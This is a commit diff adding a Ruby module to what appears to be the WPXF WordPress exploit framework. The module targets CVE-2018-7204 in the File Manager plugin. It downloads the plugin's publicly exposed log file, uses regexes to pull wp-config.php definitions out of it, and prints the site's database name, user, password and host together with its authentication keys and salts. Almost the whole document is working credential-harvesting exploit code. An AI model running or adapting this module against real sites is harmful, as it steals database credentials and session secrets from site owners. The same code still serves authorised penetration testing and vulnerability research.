|
| 1 | +# frozen_string_literal: true |
| 2 | + |
| 3 | +class Wpxf::Auxiliary::FileManagerDatabaseCredentialsDisclosure < Wpxf::Module |
| 4 | + include Wpxf |
| 5 | + |
| 6 | + def initialize |
| 7 | + super |
| 8 | + |
| 9 | + update_info( |
| 10 | + name: 'File Manager <= 5.0.1 Database Credentials Disclosure', |
| 11 | + desc: %( |
| 12 | + Prior to version 5.0.2 of the File Manager plugin, any changes |
| 13 | + made to the wp-config.php file via the plugin would result |
| 14 | + in a backup being stored in a publicly accessible plain text |
| 15 | + file. This module will download and parse the file to harvest |
| 16 | + the database credentials and salts. |
| 17 | + ), |
| 18 | + author: [ |
| 19 | + 'Colette Chamberland', # Disclosure |
| 20 | + 'rastating' # WPXF module |
| 21 | + ], |
| 22 | + references: [ |
| 23 | + ['CVE', '2018-7204'], |
| 24 | + ['WPVDB', '9036'] |
| 25 | + ], |
| 26 | + date: 'Mar 02 2018' |
| 27 | + ) |
| 28 | + end |
| 29 | + |
| 30 | + def check |
| 31 | + check_plugin_version_from_changelog('file-manager', 'readme.txt', '5.0.2') |
| 32 | + end |
| 33 | + |
| 34 | + def log_url |
| 35 | + normalize_uri(wordpress_url_uploads, 'file-manager', 'log.txt') |
| 36 | + end |
| 37 | + |
| 38 | + def parse_log(log) |
| 39 | + loot = [{ key: 'Key', value: 'Value' }] |
| 40 | + wanted_keys = [ |
| 41 | + 'DB_NAME', |
| 42 | + 'DB_USER', |
| 43 | + 'DB_PASSWORD', |
| 44 | + 'DB_HOST', |
| 45 | + 'AUTH_KEY', |
| 46 | + 'SECURE_AUTH_KEY', |
| 47 | + 'LOGGED_IN_KEY', |
| 48 | + 'NONCE_KEY', |
| 49 | + 'AUTH_SALT', |
| 50 | + 'SECURE_AUTH_SALT', |
| 51 | + 'LOGGED_IN_SALT', |
| 52 | + 'NONCE_SALT' |
| 53 | + ] |
| 54 | + |
| 55 | + matches = log.scan(/define\(\\'.+?',\s+?\\'.+?'\);/i) |
| 56 | + matches.each do |match| |
| 57 | + kvp = match.match(/define\(\\'(.+?)\\',\s+?\\'(.+?)\\'\);/i)&.captures |
| 58 | + next if kvp.nil? |
| 59 | + loot.push(key: kvp[0], value: kvp[1]) if wanted_keys.include? kvp[0] |
| 60 | + end |
| 61 | + |
| 62 | + loot |
| 63 | + end |
| 64 | + |
| 65 | + def run |
| 66 | + return false unless super |
| 67 | + |
| 68 | + emit_info 'Downloading log...' |
| 69 | + res = execute_get_request(url: log_url) |
| 70 | + if res&.code != 200 |
| 71 | + emit_error 'Failed to download log' |
| 72 | + return false |
| 73 | + end |
| 74 | + |
| 75 | + emit_info 'Parsing log...' |
| 76 | + loot = parse_log(res.body) |
| 77 | + |
| 78 | + if loot.length == 1 |
| 79 | + emit_error 'Could not find wp-config.php within the log' |
| 80 | + return false |
| 81 | + end |
| 82 | + |
| 83 | + emit_table loot |
| 84 | + true |
| 85 | + end |
| 86 | +end |
0 commit comments